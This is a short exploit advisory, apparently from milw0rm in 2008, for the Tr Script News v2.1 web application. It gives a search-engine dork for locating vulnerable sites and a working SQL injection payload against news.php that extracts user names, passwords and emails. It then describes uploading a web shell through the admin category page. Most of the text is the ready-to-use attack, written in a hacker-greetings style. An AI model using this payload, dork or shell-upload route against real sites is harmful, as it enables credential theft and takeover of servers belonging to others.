######################################################## # # # Discovered by : His0k4 {Algerian HaCker} # # # # Email : His0k4.hlm[at]gmail[dot]com # # # # Greetz to: All Dz & muslims HaCkeRs :) # # # # Special Greetz:c02,Spym4n,THe-MooRiSH # # # ######################################################## # # Script : Tr Script News v2.1 # # Download script : http://www.easy-script.com/scripts-dl/trscript-21.zip # # Dork : inurl:news.php?mode=voir # # Vulnerable file : news.php # # P.O.C # http://www.victime.com/[news_path]/news.php?mode=voir&nb=[SQL] # # Exemple: # http://www.victime.com/[news_path]/news.php?mode=voir&nb=-1/**/UNION/**/SELECT/**/1,2,3,4,concat_ws(0x3a,pseudo,pass,email),6,7/**/from/**/tr_user_news/* # # Admin login: /admin # # Note: you can upload a shell from the administrator board by going in this link "/admin/main.php?mode=ajout_cat" and it will be uploaded in "[news_path]/images/icone_cat/shell.php" # ############################################################################# # milw0rm.com [2008-04-21]